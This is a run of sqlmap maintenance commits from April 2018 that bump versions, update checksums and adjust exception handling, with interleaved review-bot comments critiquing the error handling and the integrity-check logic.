@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f0f522f95a11b24bec01d42a9a535e23 lib/core/settings.py +8c0c10ba91a0cac1315573757a5df233 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 2a681b7bd68c84248d2e200c9c6ad910f6d1b919 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Apr 2018 12:25:41 +0200 Subject: [PATCH 103/428] Fixes #3027 --- lib/core/readlineng.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index d7e2f3a62a2..2ff8b70c8d2 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -14,11 +14,11 @@ try: from readline import * import readline as _readline -except ImportError: +except: try: from pyreadline import * import pyreadline as _readline - except ImportError: + except: pass if IS_WIN and _readline: diff --git a/lib/core/settings.py b/lib/core/settings.py index af23c3b9fce..2638150802b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.2" +VERSION = "1.2.4.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 52f65a8fe73..4989c8c656c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
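Review bot: Replacing `except ImportError:` with a bare `except:` in both places of the readlineng.py hunk also catches `KeyboardInterrupt` and `SystemExit` raised while the readline modules are being imported, so a Ctrl-C during startup would be swallowed and the fallback silently taken. `except Exception:` still covers `ImportError` plus whatever non-ImportError failure the fix targets (the commit references #3027, but the triggering exception type is not visible here) without intercepting the interpreter-control exceptions, which in Python 2 are not `Exception` subclasses.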
@@ -42,11 +42,11 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py -ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py +6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8c0c10ba91a0cac1315573757a5df233 lib/core/settings.py +18951ad78a0c84df536edef011b2c0f0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 641838ed73d97b1b133f65718ade5d120eb2c593 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Apr 2018 01:06:58 +0200 Subject: [PATCH 104/428] Minor update --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2638150802b..28d4bab08c8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.3" +VERSION = "1.2.4.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 0c130916af1..de1d9bdbea8 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -578,7 +578,7 @@ class _(dict): page = page if isinstance(page, unicode) else getUnicode(page) code = ex.code - status = getUnicode(ex.msg) + status = getSafeExString(ex) kb.originalCode = kb.originalCode or code threadData.lastHTTPError = (threadData.lastRequestUID, code, status) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4989c8c656c..ed19de5c68d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -18951ad78a0c84df536edef011b2c0f0 lib/core/settings.py +e761fd544a135ac76c2ca15ec9bb874c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -acc31fac4efc25741c061bf8d7f8c3a2 lib/request/connect.py +86e8a444425006b9adba1d4e2cf66eca lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 4f2669a45aa5e12c77778794c6141d7171db710f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Apr 2018 01:13:04 +0200 Subject: [PATCH 105/428] Fixes #3030 --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 28d4bab08c8..00cd554186a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.4" +VERSION = "1.2.4.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index de1d9bdbea8..358fa22b416 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -495,7 +495,7 @@ class _(dict): responseHeaders = {} page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) if conn else None + status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None kb.connErrorCounter = 0 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ed19de5c68d..792df52406d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e761fd544a135ac76c2ca15ec9bb874c lib/core/settings.py +3cb22d21169fd140938c5ecdeb209b83 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 
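Review bot: In the connect.py hunk `conn and getattr(conn, "msg", None)` is redundant, since `getattr(None, "msg", None)` already evaluates to `None`; the line can read `status = getUnicode(conn.msg) if getattr(conn, "msg", None) else None`. The guard also changes the result for an empty `conn.msg`: previously `getUnicode("")` produced `""`, now the falsy message yields `None`, which matters if anything downstream distinguishes the two. If only the missing-attribute case is meant to be handled, `getattr(conn, "msg", None) is not None` keeps the old behaviour for empty strings. The enclosing method starts before and continues after the hunk.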
@@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -86e8a444425006b9adba1d4e2cf66eca lib/request/connect.py +18052b8924b77eb2e772350b262aae88 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 2c5f976993ca9e9db4a2ab5b9f5df47413a6dec5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Apr 2018 11:34:50 +0200 Subject: [PATCH 106/428] Fixes #3035 --- lib/core/settings.py | 2 +- plugins/dbms/mssqlserver/connector.py | 2 ++ plugins/dbms/sybase/connector.py | 2 ++ txt/checksum.md5 | 6 +++--- 4 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 00cd554186a..7e98bdd79b3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.5" +VERSION = "1.2.4.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index fe1cec52f85..36f69ef3227 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py 
@@ -43,6 +43,8 @@ def connect(self): self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) + except ValueError: + raise SqlmapConnectionException self.initCursor() self.printConnected() diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index fe1cec52f85..36f69ef3227 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -43,6 +43,8 @@ def connect(self): self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) + except ValueError: + raise SqlmapConnectionException self.initCursor() self.printConnected() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 792df52406d..2ba117da1da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3cb22d21169fd140938c5ecdeb209b83 lib/core/settings.py +6fd851fdbd1fd040f6212a6eff80bd0b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 
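Review bot: `raise SqlmapConnectionException` in the new `except ValueError:` branch raises the class without a message, so the user gets an empty connection error and the cause of the `ValueError` (presumably a malformed host or port reaching the `"%s:%d" % (self.hostname, self.port)` call two lines above) is lost; follow the style of the preceding branch: `except ValueError, msg:` / `raise SqlmapConnectionException(msg)`. The same hunk is repeated verbatim in plugins/dbms/sybase/connector.py, and both files carry the same blob ids (`fe1cec52f85..36f69ef3227`), i.e. the two connectors are byte-identical copies — a shared base class would avoid patching each in lockstep. The body of `connect` continues outside the hunk.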
@@ -159,7 +159,7 @@ ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py +9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py 51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py @@ -194,7 +194,7 @@ ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py -6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py +9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py 426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py From 4528cb014de24cacb1a2a6fbeff2f28ee09ae8ac Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Apr 2018 12:05:08 +0200 Subject: [PATCH 107/428] Minor just in case patch --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/queries.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7e98bdd79b3..e8c807fa316 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.6" +VERSION = "1.2.4.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2ba117da1da..1a86dc30a1f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6fd851fdbd1fd040f6212a6eff80bd0b lib/core/settings.py +cc7aa83cd292f28d11782127d891256e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -470,4 +470,4 @@ b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -775ed5c7e1340f76f17f6186abbd8c92 xml/queries.xml +186808373a45316a45ad5f6ca8d90ff3 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 1610a19a8e1..cbd407d47da 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -14,7 +14,7 @@ - + From a9c3b59cffea761a735abdeca24388ef2251030f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Apr 2018 12:14:46 +0200 Subject: [PATCH 108/428] Update related to the #2999 --- lib/core/option.py | 11 ++++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 6 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index f7f213c9815..23daf5761ad 100644 
--- a/lib/core/option.py +++ b/lib/core/option.py @@ -918,7 +918,7 @@ def _setTamperingFunctions(): dirname, filename = os.path.split(script) dirname = os.path.abspath(dirname) - infoMsg = "loading tamper script '%s'" % filename[:-3] + infoMsg = "loading tamper module '%s'" % filename[:-3] logger.info(infoMsg) if not os.path.exists(os.path.join(dirname, "__init__.py")): @@ -932,7 +932,7 @@ def _setTamperingFunctions(): try: module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) except Exception, ex: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) + raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex))) priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ @@ -962,7 +962,12 @@ def _setTamperingFunctions(): break elif name == "dependencies": - function() + try: + function() + except Exception, ex: + errMsg = "error occurred while checking dependencies " + errMsg += "for tamper module '%s' ('%s')" % (filename[:-3], getSafeExString(ex)) + raise SqlmapGenericException(errMsg) if not found: errMsg = "missing function 'tamper(payload, **kwargs)' " diff --git a/lib/core/settings.py b/lib/core/settings.py index e8c807fa316..5d345a6505e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.7" +VERSION = "1.2.4.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1a86dc30a1f..b0b6740f459 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
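Review bot: The new `except Exception, ex:` around `function()` also catches exceptions a tamper module's `dependencies()` raises deliberately, including sqlmap's own exception types that already carry a user-facing message, and rewraps them in `SqlmapGenericException` with the original text nested in single quotes inside parentheses; re-raise the project's own exceptions unchanged ahead of the generic handler (`except SqlmapBaseException: raise`, importing it from lib/core/exception.py if this module does not already) and drop the inner quotes: `errMsg += "for tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex))`. The 'tamper script' to 'tamper module' rename touches two messages here; other messages in `_setTamperingFunctions` (whose body starts before and continues after these hunks) that still say 'script' should be updated together for consistency.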
@@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py +83345a6b0b7e187d2cbcc280a509f03e lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cc7aa83cd292f28d11782127d891256e lib/core/settings.py +f7a3dd2314df4d3bc09ae192558ff874 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From b5b32c951cc8ad6df8aa3cde274709b638e61465 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Apr 2018 11:03:08 +0200 Subject: [PATCH 109/428] Minor update --- lib/core/common.py | 19 +++++++++++-------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 11 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a4898e25508..2908bc26057 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -3280,14 +3280,17 @@ def checkIntegrity(): logger.debug("running code integrity check") retVal = True - for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)): - path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _)) - if not os.path.isfile(path): - logger.error("missing file detected '%s'" % path) - retVal = False - elif md5File(path) != checksum: - logger.error("wrong checksum of file '%s' detected" % path) - retVal = False + + if os.path.isfile(paths.CHECKSUM_MD5): + for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)): + path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _)) + if not os.path.isfile(path): + logger.error("missing file detected '%s'" % path) + retVal = False + elif md5File(path) != checksum: + logger.error("wrong checksum of file '%s' detected" % path) + retVal = False + return retVal def unhandledExceptionMessage(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 5d345a6505e..70b9fba452e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.8" +VERSION = "1.2.4.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b0b6740f459..3af4187b6eb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
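Review bot: With the new `os.path.isfile(paths.CHECKSUM_MD5)` guard, `checkIntegrity()` returns `True` when the checksum manifest is absent, so a missing `txt/checksum.md5` is reported as a passed integrity check rather than a skipped one; log the skip, e.g. `logger.debug("checksum file '%s' not found, skipping integrity check" % paths.CHECKSUM_MD5)`, or return a distinct value if the caller can present 'not verified' separately from 'ok'. Independently, `checksum, _ = re.split(r'\s+', _)` raises `ValueError` on any blank or malformed manifest line (a path containing whitespace, a trailing empty line) unless `getFileItems` already filters those, which would abort the whole check instead of flagging one file; `_.split(None, 1)` with a two-field length check is more robust. `checkIntegrity` starts before the hunk.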
@@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -58312f5c2f252145ec4aed01bc7952a0 lib/core/common.py +31cd0692a626da935b1cac8f2cfba25a lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f7a3dd2314df4d3bc09ae192558ff874 lib/core/settings.py +3ae3e12c5183d4468fbeb1cb6f4e231c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 44f6951dfeed4bd5a64e10550d836da308f7d4bc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Apr 2018 11:35:39 +0200 Subject: [PATCH 110/428] Update of xml/banner files --- lib/core/settings.py | 2 +- lib/parse/headers.py | 2 +- txt/checksum.md5 | 14 +++++----- xml/banner/generic.xml | 4 +++ xml/banner/mysql.xml | 16 +++++++++++ xml/banner/postgresql.xml | 9 ------- xml/banner/server.xml | 56 ++++++++++++++++++++++++++++++++++++--- xml/banner/set-cookie.xml | 2 +- 8 files changed, 83 insertions(+), 22 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 70b9fba452e..746705d3f4e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.9" +VERSION = "1.2.4.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 83cd7e89065..1b3c225f319 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -31,7 +31,7 @@ def headersParser(headers): "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), } - for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): + for header in itertools.ifilter(lambda _: _ in kb.headerPaths, headers): value = headers[header] xmlfile = kb.headerPaths[header] handler = FingerprintHandler(value, kb.headersFp) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3af4187b6eb..abe940bc4f7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3ae3e12c5183d4468fbeb1cb6f4e231c lib/core/settings.py +416a9d32cc0b6ee6281e0ec062a4d169 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 
@@ -60,7 +60,7 @@ e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -8d7321a1bc1a26ac55b2398bf445d78f lib/parse/headers.py +aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py @@ -450,14 +450,14 @@ a687449cd4e45f69e33b13d41e021480 waf/uspses.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py 705ac8663513c12150cb5623ef4a04fb waf/zenedge.py -e87d59af23b7b18cd56c9883e5f02d5c xml/banner/generic.xml +dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml -b8b56f4aa34bf65365808919b97119a7 xml/banner/mysql.xml +7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml 9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml -d90fe5a47b95dff3eb1797764c9db6c5 xml/banner/postgresql.xml -b07b5c47c751787e136650ded060197f xml/banner/server.xml +c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml +4970709ca31bcaea5eb79547a132606a xml/banner/server.xml d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml -2d53fdaca0d7b42edad5192661248d76 xml/banner/set-cookie.xml +58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml index eb97b1d8810..27e8bdd8629 100644 --- a/xml/banner/generic.xml +++ b/xml/banner/generic.xml @@ -27,6 +27,10 @@ + + + + diff --git a/xml/banner/mysql.xml b/xml/banner/mysql.xml index 5ac157302c4..b637ebb92e2 100644 --- a/xml/banner/mysql.xml +++ b/xml/banner/mysql.xml 
